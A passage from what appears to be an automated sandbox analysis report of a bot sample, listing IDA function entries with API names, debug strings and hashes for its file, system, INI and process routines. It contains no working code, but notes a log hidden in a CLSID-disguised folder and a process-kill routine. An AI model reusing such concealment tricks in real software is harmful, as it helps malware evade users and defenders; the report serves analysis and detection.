                                                                    • String ID: ((*lock) != INVALID_HANDLE_VALUE)$(lock != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(lock=%p,err=%08x)$[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu)$[I] (%s) -> Done(lock=%p)$fs_file_unlock
                                                                    • API String ID: 497672076-345319545
                                                                    • Opcode ID: a3752f7d6040ae1acfe5736b31f4d48a3bbe53a3b57d5ad776e953d24dd67a7d
                                                                    • Instruction ID: fd4227f463e8a2f693931aaedb7e7f74d099f81d1d439d4956e42fdbba712dfd
                                                                    • Opcode Fuzzy Hash: a3752f7d6040ae1acfe5736b31f4d48a3bbe53a3b57d5ad776e953d24dd67a7d
                                                                    • Instruction Fuzzy Hash: BB4170A3B0CD4391FB21479BE440BBC271A6F51778F5446B6C99E176F4EE2CEA468301
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CloseErrorFileHandleLastUnlockfflushfwrite
                                                                    • String ID: ((*lock) != INVALID_HANDLE_VALUE)$(lock != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(lock=%p,err=%08x)$[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu)$[I] (%s) -> Done(lock=%p)$fs_file_unlock
                                                                    • API String ID: 497672076-345319545
                                                                    • Opcode ID: 541d76c2a99c08245025ee683c083b3f3baa156604a7956340b341959958aa97
                                                                    • Instruction ID: f8ecae8af60ad04244a4f383a349ff6893c9ea38c9f8f84b506d0992a6aa9cbe
                                                                    • Opcode Fuzzy Hash: 541d76c2a99c08245025ee683c083b3f3baa156604a7956340b341959958aa97
                                                                    • Instruction Fuzzy Hash: 5E411FA1B0CD46C9FA244B17E440ABC16509F70BB8F5402B2D93E775F5DF6CA585A30D
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorGlobalLastMemoryStatus
                                                                    • String ID: $(mi != NULL)$;$H:/Projects/rdp/bot/codebase/sys.c$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GlobalMemoryStatusEx failed(gle=%lu)$sys_mem_info$~
                                                                    • API String ID: 3848946878-1815531218
                                                                    • Opcode ID: 3081ffa9ebe953570aef1344f32cc492ba65cacdf7d42788cc980c48630e6be7
                                                                    • Instruction ID: 17b637b0f03e9ff80dd9f6316370e40c04df08c095df840811d9a0785f601471
                                                                    • Opcode Fuzzy Hash: 3081ffa9ebe953570aef1344f32cc492ba65cacdf7d42788cc980c48630e6be7
                                                                    • Instruction Fuzzy Hash: 05314450E1CF83C2FB61C79698D037C16589F65328F6456BBCA0E061F1EE6DA9C6C302
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorGlobalLastMemoryStatus
                                                                    • String ID: $(mi != NULL)$;$H:/Projects/rdp/bot/codebase/sys.c$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GlobalMemoryStatusEx failed(gle=%lu)$sys_mem_info$~
                                                                    • API String ID: 3848946878-1815531218
                                                                    • Opcode ID: 58a5b8131f7730c294c7a7b61195e634233caed24fe22c52eeb17413a9e62cf9
                                                                    • Instruction ID: fb3001a69145c5d90c0c0a7ffcf9b28e011f6cb6b8bfed07326f84abb52ef70e
                                                                    • Opcode Fuzzy Hash: 58a5b8131f7730c294c7a7b61195e634233caed24fe22c52eeb17413a9e62cf9
                                                                    • Instruction Fuzzy Hash: 70315C10E0CF4BCAFB68875AD88137C52409F35725F2041B3C72EA61B2DE6DA9C6D359
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLastModuleName
                                                                    • String ID: (hnd != NULL)$(path != NULL)$(path_sz != NULL)$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu)$fs_module_path
                                                                    • API String ID: 2776309574-3148421028
                                                                    • Opcode ID: 5a6faf5d8e9ec057bf839bbd4216e0bec5f7f99bed4a94510c5d976fa4d0c907
                                                                    • Instruction ID: 9e85a87cf88b07e7af9eb2f06e8b9e95bbe206ab4bb3718a673e7f7be9edf9a3
                                                                    • Opcode Fuzzy Hash: 5a6faf5d8e9ec057bf839bbd4216e0bec5f7f99bed4a94510c5d976fa4d0c907
                                                                    • Instruction Fuzzy Hash: 25316FA1E18E07A5FB119B9BE840BB8279DBF013B8F8840B5DD4D472B5EE3CA905C340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandleObjectSingleWait$CriticalDeleteSection
                                                                    • String ID: Done$[I] (%s) -> %s$server_cleanup
                                                                    • API String ID: 904620939-1981861988
                                                                    • Opcode ID: f2fd30ecb811a07a51ff5f666d00caf08de869e39acef24b8bcd4e9dcf5c8d2e
                                                                    • Instruction ID: e6712c6fbf140978a4c120441393d09f9e1e622fae259378f17c4c73a009c3c1
                                                                    • Opcode Fuzzy Hash: f2fd30ecb811a07a51ff5f666d00caf08de869e39acef24b8bcd4e9dcf5c8d2e
                                                                    • Instruction Fuzzy Hash: 0521A434A08E06C9EA649B2BED543383261BFA5774F5447B1D47E662F1CF3CA44A9348
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLast$CloseCreateHandleSize
                                                                    • String ID: (path != NULL)$(size != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_size
                                                                    • API String ID: 3555958901-3761180060
                                                                    • Opcode ID: f963bb75f37f1334de3abcbc8f700d6cc002006ba2a234317531b1134649a698
                                                                    • Instruction ID: 8fa57617821dc1006fb03810e4250d06f3e1ad0560195db64a0367da6171a166
                                                                    • Opcode Fuzzy Hash: f963bb75f37f1334de3abcbc8f700d6cc002006ba2a234317531b1134649a698
                                                                    • Instruction Fuzzy Hash: F1618C61D0CE5382F7704686A5457BC6349AF01378F2946FACC9E8B6F4DE2DEC808742
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLast$CloseCreateHandleSize
                                                                    • String ID: (path != NULL)$(size != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_size
                                                                    • API String ID: 3555958901-3761180060
                                                                    • Opcode ID: d5987f7009ceb68e5cbcca747f6a8a21f9eb83ddd08d55fbe6a1cc31b3dde8f8
                                                                    • Instruction ID: 6bcdc009f0082753c2bf4d14a8737447dc1c4acef7d98652cccb77687928975a
                                                                    • Opcode Fuzzy Hash: d5987f7009ceb68e5cbcca747f6a8a21f9eb83ddd08d55fbe6a1cc31b3dde8f8
                                                                    • Instruction Fuzzy Hash: AF614F61D0CD53CAFB604616A4443BC11805F70378F2646F2C93EBB6F6DE2DAE819B89
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLastModuleName
                                                                    • String ID: (hnd != NULL)$(path != NULL)$(path_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu)$fs_module_path
                                                                    • API String ID: 2776309574-787847008
                                                                    • Opcode ID: ad643fe96f47ec709d9efece58a525c64fcade27588ba8776237aacb8be2f27b
                                                                    • Instruction ID: 83e758e783c041ff44f767e265e1d1fa651265204dcb5890e5b48f5c2c650904
                                                                    • Opcode Fuzzy Hash: ad643fe96f47ec709d9efece58a525c64fcade27588ba8776237aacb8be2f27b
                                                                    • Instruction Fuzzy Hash: 17312DB1A0CE47D9FA108B56EC007E82294AF203B8F4401B2DA6DB71B6DE7DA915D30C
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateErrorHandleLastTime
                                                                    • String ID: (ctime != NULL) || (atime != NULL) || (mtime != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_stat
                                                                    • API String ID: 2291555494-1574117953
                                                                    • Opcode ID: 1f085ad19fe6e333bef82a8e5425ff26d6f1eae8eee5a8ffb35007b3cbb61f15
                                                                    • Instruction ID: 983873925c277e3384035cb136718335c7386896955aa054e6a31ff673404161
                                                                    • Opcode Fuzzy Hash: 1f085ad19fe6e333bef82a8e5425ff26d6f1eae8eee5a8ffb35007b3cbb61f15
                                                                    • Instruction Fuzzy Hash: 8B51B462E0CD4382FB654B96994077C2259AF007B8F1846FAC99E4B6F4DF3CAD85C381
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateErrorHandleLastTime
                                                                    • String ID: (ctime != NULL) || (atime != NULL) || (mtime != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_stat
                                                                    • API String ID: 2291555494-1574117953
                                                                    • Opcode ID: bd7ff0fafd328c122103e5875d3c7eab560b0812f8e46e29c44e62deda488365
                                                                    • Instruction ID: 200f742386779a669fe94d9b168b3ab503fa0e4f093d5002c96324b71abdd64d
                                                                    • Opcode Fuzzy Hash: bd7ff0fafd328c122103e5875d3c7eab560b0812f8e46e29c44e62deda488365
                                                                    • Instruction Fuzzy Hash: C4518361E0D943CAFB684A12D9047BD6150AF20778F1842B1C93DBB2F5DF2CAC858749
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$strtol
                                                                    • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
                                                                    • API String ID: 3596500743-1951032453
                                                                    • Opcode ID: 2e22015499f05fa448b848c51125f962de21535905407a7e38088b164924903e
                                                                    • Instruction ID: 95168317e7b0246f74aa116cbf6aa17151a7347cc20fe8eeab8f4dfdfcc6e611
                                                                    • Opcode Fuzzy Hash: 2e22015499f05fa448b848c51125f962de21535905407a7e38088b164924903e
                                                                    • Instruction Fuzzy Hash: 5E21BF31A08A47D9E7109B12E840BAA7764BBA47A4F400171EE6C17B75DF3CE846C708
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: _errno
                                                                    • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
                                                                    • API String ID: 2918714741-719680006
                                                                    • Opcode ID: 8febc99b48bfe99b21b927318c7ea454f6280b9247d5a0dd86312abad2330ed3
                                                                    • Instruction ID: 480a88dff5f967c834f337547f59c1e532705df0c1778ddfc135ed044876dcc7
                                                                    • Opcode Fuzzy Hash: 8febc99b48bfe99b21b927318c7ea454f6280b9247d5a0dd86312abad2330ed3
                                                                    • Instruction Fuzzy Hash: FD21D162A08E46DEE7208F26F8407AE7364BB647A4F4401B2EE5C576B5CF3CE845CB04
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastProcess$CloseHandleNextOpenProcess32Terminatestrcmp
                                                                    • String ID: [E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                                                                    • API String ID: 477549591-1116693529
                                                                    • Opcode ID: 2ad748291eabf6316bf7f716528a36c01ee9cfa80688fbb5b07d7067bf160f7f
                                                                    • Instruction ID: 0d3e9f5587720cdc6ce509c1accaa2c313d2538bb67d66828e9da8521c238f09
                                                                    • Opcode Fuzzy Hash: 2ad748291eabf6316bf7f716528a36c01ee9cfa80688fbb5b07d7067bf160f7f
                                                                    • Instruction Fuzzy Hash: 27219DA2B0C70356FAB59F15A19437B16D1EFC5B80F085035CDCE4A2B5EE2DEC488E80
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$HandleLibraryLoadModule
                                                                    • String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
                                                                    • API String ID: 384173800-4041758303
                                                                    • Opcode ID: 8841966da993e30bbd5ab2c158156969493ba5c8471771cc3d252178fb708fc7
                                                                    • Instruction ID: 25e446ba5fd779a13d65faf33b32b5a01d7a9f46af7a8650c0528916d144b1df
                                                                    • Opcode Fuzzy Hash: 8841966da993e30bbd5ab2c158156969493ba5c8471771cc3d252178fb708fc7
                                                                    • Instruction Fuzzy Hash: CDF0D465E4BE1BD4EF06DB53FC504A427AAAF897B0B9405B2C80D02370EF2CA54AC300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$HandleLibraryLoadModule
                                                                    • String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
                                                                    • API String ID: 384173800-4041758303
                                                                    • Opcode ID: 8e652e63ee7d6c79b182f84b0a244bf925ea7da987e58bba6fe3b7ef82a224eb
                                                                    • Instruction ID: f550b64dcd3a628401137f0c33e54f54dddd704b6a6cc198509a188e99198266
                                                                    • Opcode Fuzzy Hash: 8e652e63ee7d6c79b182f84b0a244bf925ea7da987e58bba6fe3b7ef82a224eb
                                                                    • Instruction Fuzzy Hash: 0AF0B720A0AE17D9EE05DB53FC500B827A4BF687A0B4406B6C82D76375FF2CE55AC308
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CopyErrorFileLastfflushfwrite
                                                                    • String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
                                                                    • API String ID: 2887799713-3464183404
                                                                    • Opcode ID: 9602df945be126a78eb9839a344b0b067acd0e49c73a6f61a765f3d0829be5e2
                                                                    • Instruction ID: 1786dee3d873af6daf08d780bde201b51aa99c8f025673af451ab22b221a9fda
